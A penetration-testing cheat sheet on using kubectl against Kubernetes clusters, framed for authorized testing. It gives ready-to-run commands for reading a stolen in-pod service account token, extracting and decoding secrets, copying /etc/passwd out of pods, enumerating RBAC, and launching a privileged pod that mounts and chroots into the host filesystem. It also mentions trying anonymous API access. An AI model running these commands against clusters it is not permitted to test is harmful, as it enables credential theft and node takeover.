CyberCheatsheets

kubectl Cheat Sheet

Kubernetes CLI for cluster enumeration, secret access, and pod exec during authorized K8s penetration tests.

Cloud & Containersenumerationk8skubernetesUpdated 2026-06-02

Overview

kubectl talks to the Kubernetes API server. After obtaining kubeconfig, SA tokens, or dashboard access, enumerate namespaces, secrets, RBAC, and attempt privilege escalation to cluster-admin.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl && sudo mv kubectl /usr/local/bin/
kubectl version --client

Essential commands

Context / auth

kubectl config get-contexts
kubectl config use-context prod
kubectl cluster-info

Resources

kubectl get pods -A
kubectl get secrets -n kube-system
kubectl describe pod POD -n NAMESPACE

Common workflows

Stolen service account token (in-pod) —

export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
export APISERVER=https://kubernetes.default.svc
export CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
kubectl --token="$TOKEN" --server="$APISERVER" --certificate-authority="$CACERT" get pods

Secret extraction —

kubectl get secrets -A
kubectl get secret db-creds -n app -o jsonpath='{.data.password}' | base64 -d
kubectl get secret db-creds -n app -o yaml

Exec / lateral movement —

kubectl exec -it pod-name -n app -- /bin/sh
kubectl cp app/pod-name:/etc/passwd ./passwd
kubectl port-forward -n app svc/internal-api 8080:80

RBAC enumeration —

kubectl auth can-i --list
kubectl auth can-i create pods --all-namespaces
kubectl get clusterrolebindings -o wide
kubectl get rolebindings -A

Privileged pod (node escape vector) —

kubectl get pods -A -o json | jq '.items[] | select(.spec.containers[].securityContext.privileged==true) | .metadata.name'
kubectl run pwn --image=alpine --overrides='{"spec":{"hostPID":true,"hostNetwork":true,"containers":[{"name":"pwn","image":"alpine","stdin":true,"tty":true,"securityContext":{"privileged":true},"volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"name":"host","hostPath":{"path":"/"}}]}}' -it --rm -- chroot /host bash

kubeconfig from compromised workstation —

cat ~/.kube/config
kubectl get nodes
kubectl get namespaces

Flags reference

-n NAMESPACE

Target namespace

-A / --all-namespaces

All namespaces

-o yaml\

json\

--token TOKEN

Bearer token auth

--kubeconfig FILE

Config path

auth can-i VERB RESOURCE

Permission check

-it

Interactive TTY for exec

Tips

  • kube-system secrets and cluster-admin bindings are high value.
  • Use peirates, kube-hunter, kdigger for guided K8s attacks after kubectl access.
  • Anonymous auth: kubectl --server=IP:6443 --insecure-skip-tls-verify get pods sometimes works on misconfigs.
  • Audit logs record kubectl API calls — coordinate with blue team in purple engagements.

References

Related cheat sheets